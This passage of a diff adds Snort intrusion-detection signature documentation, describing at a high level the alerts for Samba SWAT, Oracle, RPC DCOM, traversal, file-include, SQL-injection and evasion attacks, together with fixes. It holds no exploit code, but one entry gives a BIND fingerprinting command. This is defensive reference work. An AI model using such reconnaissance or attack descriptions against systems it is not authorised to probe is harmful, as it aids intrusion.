+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2597.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2597
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in the Samba Web Administration Tool (SWAT).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in SWAT that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in the functions that handle base64 decoding
+during HTTP basic authentication. Exploitation of this vulnerability
+may present the attacker with the opportunity to gain control of the
+affected system.
+
+--
+Affected Systems:
+	 Versions of Samba greater than or equal to 3.0.2 and
+     less than 3.0.5
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the SWAT
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600
+
+Bugtraq:
+http://www.securityfocus.com/bid/10780
+
+--
--- /dev/null
+++ b/doc/signatures/2678.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2678
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure start_log
+. This procedure is included in
+ctx_output.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1598.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1598
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/119-2.txt
@@ -0,0 +1,70 @@
+Rule: 
+
+--
+Sid: 
+119-2
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when double encoded characters are detected in
+web traffic. This is abnormal behavior and may be an indicator of a
+possible attack against a vulnerable system.
+
+This may also be an attempt to evade IDS.
+
+--
+Affected Systems:
+	Microsoft IIS Servers.
+
+--
+Attack Scenarios: 
+An attacker might double encode the request to the web server, this may
+then evade an IDS monitoring traffic and could then launch a successful
+attack without being detected.
+
+-- 
+Ease of Attack: 
+Simple. Exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software
+
+Use Apache.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/922.txt
@@ -0,0 +1,62 @@
+SID:
+922
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000466.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000466
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Free QBoard" application running on a webserver. 
+Access to the file "post.php" using a remote file being passed as the "qb_path" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "qb_path" parameter in the "post.php" script used by the 
+"Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000535.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000535
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "IMGallery" application running on a webserver. Access to 
+the file "galeria.php" with SQL commands being passed as the "start" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "start" parameter in the "galeria.php" script used by 
+the "IMGallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IMGallery
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2057.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2057
+
+--
+Summary:
+helpout.exe.
+
+--
+Impact:
+Denial of Service
+
+--
+Detailed Information:
+It is possible to issue a denial of service to vulnerable versions of 
+the WebSphere caching proxy by sending an illegitimate request to the 
+cgi script helpout.exe.
+
+scanner nessus to scan the server for possible exploit opportunities.
+
+--
+Affected Systems:
+WebSphere caching proxy
+
+--
+Attack Scenarios:
+The attacker merely needs to send a bad request to helpout.exe.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-vulnerable version of WebSphere caching proxy 
+or disable the script helpout.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11162
+
+--
--- /dev/null
+++ b/doc/signatures/1488.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1488
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000738.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000738
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "EditIP.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "EditIP.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1476.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1476
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2232.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2232
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
--- /dev/null
+++ b/doc/signatures/3287.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3287
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/925.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+925
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1435.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1435
+
+--
+Summary:
+This event is generated when an attempt is made to query authors.bind on your DNS server.
+
+--
+Impact:
+Reconnaissance. This informs an attacker that version of BIND running is 9 or greater.
+
+--
+Detailed Information:
+Beginning with version of BIND 9, the authors of BIND created a new "feature" that would allow a user to query for the authors' names.  This feature is enabled by default allowing an attacker to query the DNS server and examine the response.  If the response returns the BIND authors' names, the attacker knows that the version of BIND running is 9 or higher.
+
+--
+Affected Systems:
+BIND versions 9.
+
+--
+Attack Scenarios:
+An attacker can execute this query to find DNS servers running BIND version 9 and higher.
+
+--
+Ease of Attack:
+Simple. Use the Unix command 'dig @ns.com authors.bind txt chaos'  
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the ability to retrieve the authors.bind chaos record by either applying the patch from ISC or by modifying the servers configuration file. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10728
+
+Arachnids:
+http://www.whitehats.com/info/IDS480
+
+--
--- /dev/null
+++ b/doc/signatures/1758.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1758
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/489.txt
@@ -0,0 +1,75 @@
+Rule:
+  
+--
+
+Rule:
+--
+Sid:
+489
+
+--
+
+Summary:
+This event is generated when an attempt is made to log into an ftp 
+server with an empty password.
+
+--
+
+Impact:
+Possible unauthorized access, invalid login attempt.
+
+--
+
+Detailed Information:
+An attempt was made to log into an ftp server with an empty password. 
+This is an unusual behavior as every ftp login usually has a password, 
+even anonymous ones. An empty password might mean the system was already
+compromised and a username exists with no password.
+
+--
+
+Affected Systems:
+Machines running ftp servers.
+
+--
+
+Attack Scenarios:
+An attacker gains access to the system via a vulnerability, creates a 
+login without a password and then tries to ftp to the system with that 
+login.
+
+--
+
+Ease of Attack:
+Simple, no exploit software required.
+
+--
+
+False Positives:
+There might be legitimate users on the system with empty passwords, but 
+not very likely.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Check all the usernames on the system for empty passwords.
+
+--
+
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS322
+
+--
--- /dev/null
+++ b/doc/signatures/2184.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2184
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in the xlog function of certain Linux NFS Utils packages.
+
+Specifically this event is generated when TCP is used as the attack medium.
+
+--
+Impact:
+Denial of Service (DoS), possible arbitrary code execution.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol. A vulnerability exists in some versions of the Linux NFS Utilities package prior to 1.0.4 that can lead to the possible execution of arbitrary code or a DoS against the affected server.
+
+A programming error in the xlog function may be exploited by an attacker by sending RPC requests to mountd that do not contain any newline characters. This causes a buffer to overflow thus presenting the attacker with the opportunity to execute code.
+
+--
+Affected Systems:
+Systems using Linux NFS Utils prior to version 1.0.4.
+
+--
+Attack Scenarios:
+An attacker may send a specially crafted RPC request or mount command to the NFS server that does not contain any newline characters.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3394.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3394
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000164.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000164
+
+-- 
+Summary: 
+This event is generated when an ICMP packet crafted to exploit a denial of 
+service vulnerability in the Linux kernel is detected.
+
+--
+Impact:
+A denial of service will be caused against vulnerable hosts. If an attacker 
+sends a continuous stream of such packets, the host can be prevented from 
+functioning properly for a prolonged period of time.
+
+--
+Detailed Information:
+Linux kernel versions below 2.6.13 contain a flaw which will result in a null 
+pointer dereference when processing ICMP packets that contain invalid SCTP 
+data. In order to be vulnerable, a host must have SCTP enabled.
+
+--
+Affected Systems:
+Any Linux system with a kernel version < 2.6.13 with SCTP enabled.
+
+--
+Attack Scenarios:
+An attacker could use a script to send malformed packets to a vulnerable host.
+
+--
+Ease of Attack:
+Simple, as a publicly available exploit script exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Linux systems' kernel to version 2.6.13 or higher. Alternately, disable 
+SCTP or use a firewall to block ICMP traffic at your network's border.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+http://oss.sgi.com/projects/netdev/archive/2005-07/msg00142.html
+
+--
--- /dev/null
+++ b/doc/signatures/2862.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2862
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_number
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3424.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3424
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
